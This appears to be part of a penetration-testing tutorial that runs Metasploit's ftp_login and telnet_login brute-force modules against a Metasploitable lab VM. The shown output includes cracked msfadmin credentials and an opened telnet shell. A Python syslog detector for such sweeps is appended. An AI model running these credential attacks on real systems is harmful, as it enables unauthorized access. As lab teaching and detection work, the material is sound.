BASIC PENETRATION CONCEPTS ON A (VULNERABLE) GNU/LINUX PLATFORM USING METASPLOIT FRAMEWORK – PART III
Attacking Vulnerable FTP and Telnet Services

Finding Weaknesses in the FTP Service (Port 21) and the Telnet Service (Port 23)

According to the scan performed earlier, the FTP service was identified as open on port 21 and the Telnet service on port 23. As in the case of MySQL and PostgreSQL, the ftp_login and telnet_login modules can be used respectively to test the credentials on each service.

ftp_login

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > show options

Module options (auxiliary/scanner/ftp/ftp_version):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT    21                   yes       The target port
   THREADS  1                    yes       The number of concurrent threads

msf auxiliary(ftp_version) > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options

Module options (auxiliary/scanner/ftp/ftp_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             21               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ftp_login) > set PASS_FILE /home/adastra/UTILITIES/userPass.lst
PASS_FILE => /home/adastra/UTILITIES/userPass.lst
msf auxiliary(ftp_login) > set USER_FILE /home/adastra/UTILITIES/userlist.lst
USER_FILE => /home/adastra/UTILITIES/userlist.lst
msf auxiliary(ftp_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(ftp_login) > set RHOSTS 192.168.1.34
RHOSTS => 192.168.1.34
msf auxiliary(ftp_login) > run

[*] 192.168.1.34:21 - Starting FTP login sweep
[*] Connecting to FTP server 192.168.1.34:21...
[*] Connected to target FTP server.
[*] 192.168.1.34:21 - FTP Banner: '220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.1.34]\x0d\x0a'
[*] 192.168.1.34:21 - Attempting FTP login for 'admin':''
[*] 192.168.1.34:21 - Failed FTP login for 'admin':''
........................
[+] 192.168.1.34:21 - Successful FTP login for 'msfadmin':'msfadmin'
[*] 192.168.1.34:21 - User 'msfadmin' has READ/WRITE access
[*] 192.168.1.34:21 - Attempting FTP login for 'admin':'root'
[*] Connecting to FTP server 192.168.1.34:21...
[*] Connected to target FTP server.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

telnet_login

msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > show options

Module options (auxiliary/scanner/telnet/telnet_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS            192.168.1.34     yes       The target address range or CIDR identifier
   RPORT             23               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(telnet_login) > set PASS_FILE /home/adastra/UTILITIES/userPass.lst
PASS_FILE => /home/adastra/UTILITIES/userPass.lst
msf auxiliary(telnet_login) > set USERPASS_FILE /home/adastra/UTILITIES/userlist.lst
USERPASS_FILE => /home/adastra/UTILITIES/userlist.lst
msf auxiliary(telnet_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(telnet_login) > run

[*] 192.168.1.34:23 Telnet - Attempting: '':''
[*] 192.168.1.34:23 Banner: Ubuntu 8.04 metasploitable login:
[*] 192.168.1.34:23 Prompt: Password:
[*] 192.168.1.34:23 Result: Login incorrect
[*] 192.168.1.34:23 Telnet - Attempting: 'admin':''
[*] 192.168.1.34:23 Banner: Ubuntu 8.04 metasploitable login:
[*] 192.168.1.34:23 Prompt: Password:
[*] 192.168.1.34:23 Result: Login incorrect
...................
[*] 192.168.1.34:23 Telnet - Attempting: 'msfadmin':'msfadmin'
[*] 192.168.1.34:23 Banner: Ubuntu 8.04 metasploitable login:
[*] 192.168.1.34:23 Prompt: Password:
[*] 192.168.1.34:23 Result:
Last login: Tue May 17 16:22:51 EDT 2011 from 192.168.1.33 on pts/1 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ No mail. 1 failure since last login. Last was Tue 17 May 2011 05:42:07 PM EDT on pts/0.
msfadmin@metasploitable:~$
[+] 192.168.1.34 - SUCCESSFUL LOGIN msfadmin : msfadmin
[*] Command shell session 2 opened (192.168.1.33:57984 -> 192.168.1.34:23) at Tue May 17 23:42:18 +0200 2011
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As can be seen, a simple brute-force attack was enough to break into both services. This will most likely not work in the real world against correctly configured servers and services, but for demonstration purposes it is valid. In a real attack it would probably be better to use the advanced options of THC Hydra for this kind of attack.
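The defender's view of the two sweeps above (the FTP one on port 21 and the Telnet one on port 23) is what they leave in the target's syslog: a burst of failed logins from one source, often against several usernames, followed by a success. The following is an added example, not code from the original post nor from the Metasploit project: a small detector that parses syslog lines from ProFTPD and from /bin/login (which handles Telnet logins), groups them by source address and service, and raises an alert when one source fails at least a threshold number of logins inside a sliding time window, recording the account of any success that arrives while that window is still full. The sample log lines, hostnames, PIDs and timestamps are constructed; they approximate the real ProFTPD and login(1) message formats, but the exact wording is an assumption, so the regular expressions should be adapted to the logs actually in use.

```python
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import List, Optional, Set

# Constructed sample syslog lines (not captured from the lab in the post). They
# approximate what ProFTPD and /bin/login write during a login sweep; the exact
# wording is an assumption, so adjust the regexes to your own log format.
SAMPLE_LOG = [
    "May 17 23:41:50 metasploitable proftpd[4312]: metasploitable (192.168.1.33[192.168.1.33]) - USER admin: no such user found from 192.168.1.33 [192.168.1.33] to 192.168.1.34:21",
    "May 17 23:41:51 metasploitable proftpd[4313]: metasploitable (192.168.1.33[192.168.1.33]) - USER root (Login failed): Incorrect password.",
    "May 17 23:41:52 metasploitable proftpd[4314]: metasploitable (192.168.1.33[192.168.1.33]) - USER guest: no such user found from 192.168.1.33 [192.168.1.33] to 192.168.1.34:21",
    "May 17 23:41:53 metasploitable proftpd[4315]: metasploitable (192.168.1.33[192.168.1.33]) - USER test: no such user found from 192.168.1.33 [192.168.1.33] to 192.168.1.34:21",
    "May 17 23:41:54 metasploitable proftpd[4316]: metasploitable (192.168.1.33[192.168.1.33]) - USER user: no such user found from 192.168.1.33 [192.168.1.33] to 192.168.1.34:21",
    "May 17 23:41:55 metasploitable proftpd[4317]: metasploitable (192.168.1.33[192.168.1.33]) - USER admin (Login failed): Incorrect password.",
    "May 17 23:41:56 metasploitable proftpd[4318]: metasploitable (192.168.1.33[192.168.1.33]) - USER msfadmin: Login successful.",
    "May 17 23:41:57 metasploitable proftpd[4319]: metasploitable (192.168.1.40[192.168.1.40]) - USER alice: Login successful.",
    "May 17 23:42:01 metasploitable CRON[4320]: (root) CMD (run-parts /etc/cron.hourly)",
    "May 17 23:42:10 metasploitable login[4401]: FAILED LOGIN (1) on 'pts/1' from '192.168.1.33' FOR 'admin', Authentication failure",
    "May 17 23:42:11 metasploitable login[4402]: FAILED LOGIN (2) on 'pts/1' from '192.168.1.33' FOR 'root', Authentication failure",
    "May 17 23:42:12 metasploitable login[4403]: FAILED LOGIN (3) on 'pts/1' from '192.168.1.33' FOR 'guest', Authentication failure",
    "May 17 23:42:13 metasploitable login[4404]: FAILED LOGIN (1) on 'pts/1' from '192.168.1.33' FOR 'test', Authentication failure",
    "May 17 23:42:14 metasploitable login[4405]: FAILED LOGIN (2) on 'pts/1' from '192.168.1.33' FOR 'user', Authentication failure",
    "May 17 23:42:18 metasploitable login[4410]: LOGIN ON pts/1 BY msfadmin FROM 192.168.1.33",
]

# syslog prefix: timestamp, host, then the program-specific message
LINE_RE = re.compile(r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ (?P<rest>.*)$")
FTP_PREFIX = r"proftpd\[\d+\]: \S+ \((?P<src>[\d.]+)\[[\d.]+\]\) - USER (?P<user>\w+)"
PATTERNS = [  # (service, outcome, regex); assumed message formats, see above
    ("ftp", "fail", re.compile(FTP_PREFIX + r"[:\s].*(no such user|Login failed)")),
    ("ftp", "success", re.compile(FTP_PREFIX + r": Login successful")),
    ("telnet", "fail", re.compile(r"login\[\d+\]: FAILED LOGIN \(\d+\) on '\S+' from '(?P<src>[\d.]+)' FOR '(?P<user>\w+)'")),
    ("telnet", "success", re.compile(r"login\[\d+\]: LOGIN ON \S+ BY (?P<user>\w+) FROM (?P<src>[\d.]+)")),
]


@dataclass
class Event:
    ts: datetime
    service: str
    outcome: str  # "fail" or "success"
    src: str
    user: str


@dataclass
class Alert:
    src: str
    service: str
    failures: int                 # total failed logins from this source
    users_tried: Set[str] = field(default_factory=set)
    compromised_user: Optional[str] = None  # set if a success followed the sweep


def parse_line(line: str, year: int = 2011) -> Optional[Event]:
    """Turn one syslog line into an Event, or None if it is not a login record."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=year)
    for service, outcome, rx in PATTERNS:
        hit = rx.search(m.group("rest"))
        if hit:
            return Event(ts, service, outcome, hit.group("src"), hit.group("user"))
    return None


def detect_bruteforce(lines, threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> List[Alert]:
    """Alert on every (source, service) pair with >= threshold failures inside one
    sliding window; a success that arrives while the window is still full is
    recorded as the likely compromised account."""
    groups = defaultdict(list)
    for ev in filter(None, map(parse_line, lines)):
        groups[(ev.src, ev.service)].append(ev)
    alerts = []
    for (src, service), evs in groups.items():
        evs.sort(key=lambda e: e.ts)
        recent = deque()  # timestamps of failures still inside the window
        users, failures, sweep, compromised = set(), 0, False, None
        for ev in evs:
            while recent and ev.ts - recent[0] > window:
                recent.popleft()
            if ev.outcome == "fail":
                recent.append(ev.ts)
                failures += 1
                users.add(ev.user)
                sweep = sweep or len(recent) >= threshold
            elif len(recent) >= threshold and compromised is None:
                compromised = ev.user
        if sweep:
            alerts.append(Alert(src, service, failures, users, compromised))
    return sorted(alerts, key=lambda a: (a.service, a.src))


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        verdict = f"then SUCCESS as '{a.compromised_user}'" if a.compromised_user else "no success seen"
        print(f"[{a.service}] {a.src}: {a.failures} failures across "
              f"{len(a.users_tried)} usernames, {verdict}")
```

Run as-is it reports both sweeps from 192.168.1.33 and names msfadmin as the account that logged in right after each one, while the normal login from 192.168.1.40 produces nothing. The window is evaluated per source and service, so the two modules' sweeps are reported separately; lowering BRUTEFORCE_SPEED or spreading attempts across many source addresses would push the failures out of a 60-second window, which is why a real deployment pairs this kind of rule with per-account lockout or fail2ban-style blocking on the service itself.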